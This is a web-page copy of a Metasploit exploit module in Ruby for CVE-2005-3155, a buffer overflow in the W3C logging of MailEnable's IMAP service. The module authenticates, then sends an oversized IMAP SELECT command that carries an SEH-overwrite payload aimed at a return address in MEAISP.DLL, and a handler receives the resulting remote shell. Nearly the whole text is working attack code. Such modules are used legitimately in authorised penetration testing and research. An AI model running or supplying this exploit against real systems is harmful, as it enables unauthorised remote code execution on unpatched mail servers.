Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/imap/mailenable_w3c_select.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = GreatRanking
8
9
include Msf::Exploit::Remote::Imap
10
include Msf::Exploit::Remote::Seh
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow',
17
'Description' => %q{
18
This module exploits a buffer overflow in the W3C logging
19
functionality of the MailEnable IMAPD service. Logging is
20
not enabled by default and this exploit requires a valid
21
username and password to exploit the flaw. MailEnable
22
Professional version 1.6 and prior and MailEnable Enterprise
23
version 1.1 and prior are affected.
24
},
25
'Author' => [ 'MC' ],
26
'License' => MSF_LICENSE,
27
'References' => [
28
[ 'CVE', '2005-3155'],
29
[ 'OSVDB', '19842'],
30
[ 'BID', '15006'],
31
],
32
'Privileged' => true,
33
'DefaultOptions' => {
34
'EXITFUNC' => 'thread',
35
},
36
'Payload' => {
37
'Space' => 600,
38
'BadChars' => "\x00\x0a\x0d\x20",
39
'StackAdjustment' => -3500,
40
},
41
'Platform' => 'win',
42
'Targets' => [
43
['MailEnable 1.54 Pro Universal', { 'Ret' => 0x1001c019 } ] # MEAISP.DLL
44
],
45
'DisclosureDate' => '2005-10-03',
46
'DefaultTarget' => 0,
47
'Notes' => {
48
'Reliability' => UNKNOWN_RELIABILITY,
49
'Stability' => UNKNOWN_STABILITY,
50
'SideEffects' => UNKNOWN_SIDE_EFFECTS
51
}
52
)
53
)
54
end
55
56
def check
57
connect
58
disconnect
59
60
if (banner and banner =~ /MailEnable Service, Version: 0-1\.54/)
61
return Exploit::CheckCode::Appears
62
end
63
64
return Exploit::CheckCode::Safe
65
end
66
67
def exploit
68
connect_login
69
70
buf = rand_text_alphanumeric(6196, payload_badchars)
71
seh = generate_seh_payload(target.ret)
72
req = 'a01 SELECT ' + buf + seh + "\r\n"
73
sock.put(req)
74
75
handler
76
disconnect
77
end
78
end
79
80